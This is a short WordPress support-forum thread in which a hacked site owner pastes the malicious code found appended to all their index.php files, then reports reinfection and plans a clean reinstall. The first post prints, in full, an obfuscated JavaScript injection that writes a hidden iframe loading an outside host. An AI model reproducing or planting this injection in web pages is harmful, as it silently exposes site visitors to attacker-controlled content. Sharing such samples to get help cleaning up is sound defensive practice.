WordPress.org

Forums

Hacked WordPress (3 posts)

  1. anjuz
    Member
    Posted 6 years ago #

    Hi,

    I was using WordPress 2.6.2 and my site got hacked. I have since upgraded to 2.7.1 and believe that I have cleaned it all up now.

    This is what someone put into all of my index.php files:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?><!-- ad --><script>
    uyimh=687;
    qxcxg=4804;
    ddytx=7948;
    xkjpv="write";
    mzsrv="me";
    zqfqw="et";
    gdtrk="/' st";
    rpiia="yl";
    qxaol="";
    ldlvw="i";
    zfhuu="ty";
    hvkhb=":h";
    hbqmm="d";
    hauzn="";
    zdqdp=4;
    sjgbi="if";
    rpygo="r";
    syjnh=" sr";
    rwanv="c";
    elujl="=";
    hrgnc=863;
    akzpp=8853;
    tplxn=" ";
    cvtot="</";
    qtndm="";
    jlooz=3953;
    uyimh=687;
    qxcxg=4804;
    ddytx=7948;
    xkjpv="write";
    mzsrv="me";
    zqfqw="et";
    gdtrk="/' st";
    rpiia="yl";
    qxaol="";
    ldlvw="i";
    zfhuu="ty";
    hvkhb=":h";
    hbqmm="d";
    hauzn="";
    zdqdp=4;
    sjgbi="if";
    rpygo="r";
    syjnh=" sr";
    rwanv="c";
    elujl="=";
    hrgnc=863;
    akzpp=8853;
    tplxn=" ";
    cvtot="</";
    qtndm="";
    jlooz=3953;
    gftzo=(9.007e3>=5e1?uyimh:qxcxg);
    jjaqh=(ddytx>.2438?xkjpv:3.);
    gmbpt=(7.3e1>=36?mzsrv:.45);
    zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
    hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
    rmtyf=(6.5e1,"");
    
    aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad -->
  2. anjuz
    Member
    Posted 6 years ago #

    OK, the hacker did the same thing again.

    This code above loads some hidden ad system, but I can't be bothered figuring out what that javascript really points to.

    I'm wiping out everything and starting a fresh install.

  3. whooami
    Member
    Posted 6 years ago #

    delete ALL the files.

Topic Closed

This topic has been closed to new replies.

About this Topic